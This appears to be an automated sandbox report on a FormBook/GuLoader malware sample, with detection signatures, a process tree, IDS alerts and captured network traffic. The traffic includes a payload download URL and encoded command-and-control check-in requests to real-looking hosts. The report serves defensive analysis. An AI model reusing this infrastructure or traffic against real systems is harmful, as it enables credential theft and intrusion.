Windows Analysis Report
02Eh1ah35H.exe

Overview

General Information

Sample name: 02Eh1ah35H.exe
Analysis ID: 1588655
MD5: 8b28f25bafe08a5b838ee152a75d14ae
SHA1: ed2b19ce4a23e1bb09f76658f9b257baaa4d7f59
SHA256: 8c4c1550cb63a4c8abebb1ef8a7601953c6c1f0d02f1080f1fb7adc306b99c31

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • 02Eh1ah35H.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\02Eh1ah35H.exe" MD5: 8B28F25BAFE08A5B838EE152A75D14AE)
    • 02Eh1ah35H.exe (PID: 312 cmdline: "C:\Users\user\Desktop\02Eh1ah35H.exe" MD5: 8B28F25BAFE08A5B838EE152A75D14AE)
      • RAVCpl64.exe (PID: 6612 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • waitfor.exe (PID: 3964 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • firefox.exe (PID: 532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.28256040548.0000000004AC5000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
No Sigma rule has matched

          AV Detection

          Source: 02Eh1ah35H.exeAvira: detected
          Source: 02Eh1ah35H.exeReversingLabs: Detection: 50%
          Source: 02Eh1ah35H.exeVirustotal: Detection: 69%
          Source: Yara matchFile source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: 02Eh1ah35H.exeJoe Sandbox ML: detected
          Source: 02Eh1ah35H.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49757 version: TLS 1.2
          Source: 02Eh1ah35H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: waitfor.pdbGCTL source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp
          Source: Binary string: waitfor.pdb source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 02Eh1ah35H.exe, 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then mov ebx, 00000004h4_2_050804CE

          Networking

          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49758 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49770 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49762 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49766 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49810 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49778 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 202.92.5.23:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49840 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49859 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49786 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49819 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49790 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49839 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49794 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49838 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49782 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49798 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49834 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49851 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49853 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49802 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49830 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49854 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49774 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49806 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49855 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49857 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49858 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 208.91.197.39:80
          Source: DNS query: www.optimismbank.xyz
          Source: unknownNetwork traffic detected: IP country count 10
          Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49757 -> 122.201.127.17:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:55:43 GMTserver: Apacheset-cookie: __tad=1736564143.3375901; expires=Tue, 09-Jan-2035 02:55:43 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:55:46 GMTserver: Apacheset-cookie: __tad=1736564146.2518747; expires=Tue, 09-Jan-2035 02:55:46 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:55:48 GMTserver: Apacheset-cookie: __tad=1736564148.6182786; expires=Tue, 09-Jan-2035 02:55:48 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 03:00:09 GMTserver: Apacheset-cookie: __tad=1736564409.2393264; expires=Tue, 09-Jan-2035 03:00:09 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 03:00:11 GMTserver: Apacheset-cookie: __tad=1736564411.5059612; expires=Tue, 09-Jan-2035 03:00:11 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 03:00:14 GMTserver: Apacheset-cookie: __tad=1736564414.1745252; expires=Tue, 09-Jan-2035 03:00:14 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
          Source: global trafficHTTP traffic detected: GET /BJuAryIbeCLh111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
